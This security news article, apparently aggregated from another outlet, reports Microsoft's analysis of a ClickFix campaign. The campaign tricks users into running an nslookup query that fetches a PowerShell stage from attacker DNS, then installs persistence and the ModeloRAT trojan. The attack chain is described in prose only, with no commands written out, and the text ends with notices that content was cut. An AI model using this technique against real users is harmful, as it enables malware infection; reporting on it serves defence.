According to Microsoft, the ClickFix social engineering technique has evolved in a refined manner, emphasizing that even the most common software applications can be repurposed into covert channels for malware distribution. Using this latest iteration, hackers are no longer only relying on deceptive downloads and embedded scripts to spread malware.
Through carefully staged prompts, they manipulate victims’ trust by instructing them to execute what appears to be harmless system commands. Under this veneer of legitimacy, the command initiates a DNS query via nslookup, quietly retrieving the next-stage payload from attacker-controlled infrastructure.
By embedding malicious intent within routine administrative behaviors, the campaign transforms a standard troubleshooting tool into an unassuming channel of infection.
In Microsoft’s analysis, the newly observed campaign instructs victims to use an nslookup command to query a DNS server controlled by the attacker, rather than the system’s configured resolver, as directed by the attacker.
It is designed to request a specific hostname from a remote IP address controlled by the threat actor and forward the query to that address. Instead of returning a regular DNS record, the server responds with a crafted DNS entry with a second PowerShell command embedded in the “Name” field.
In addition, the Windows command interpreter parses and executes that response, thereby converting a standard DNS query into a covert staging mechanism for code delivery. According to Microsoft Threat Intelligence, this strategy represents another evolution of ClickFix’s evasion strategy.
While earlier versions primarily utilized HTTP-based payload retrieval, this version relies on DNS for both communication and dynamic payload distribution.
In spite of the unclear lure used to persuade users, victims are reportedly instructed to execute the command through Windows Run, strengthening the tactic’s dependency on social engineering rather than exploits.
By moving execution to user-initiated system utilities, attackers are reducing the probability that conventional web or network filtering controls will be triggered.
PowerShell scripts that are executed in this stage retrieve additional components from infrastructure under attacker control.
As a result of Microsoft’s investigation, it has been determined that the subsequent payload consists of a compressed archive containing a portable Python runtime along with malicious scripts. Prior to establishing persistence on the infected host, these scripts conduct reconnaissance against the host and its domain environment, gathering network and system information.
In this method, the user creates a VBScript file in their AppData directory, and a shortcut is placed in their Windows Startup folder to ensure execution upon logon. A remote access trojan named ModeloRAT is deployed as part of the infection chain, granting the operator sustained control over compromised systems.
A DNS-based staging strategy allows adversaries to adjust payloads in real time while blending malicious traffic with routine name resolution activity by embedding executable instructions within DNS responses. As well as complicating detection, this DNS-based staging technique demonstrates that ClickFix continues to refine itself into a mod
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.
This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents
Read the original article: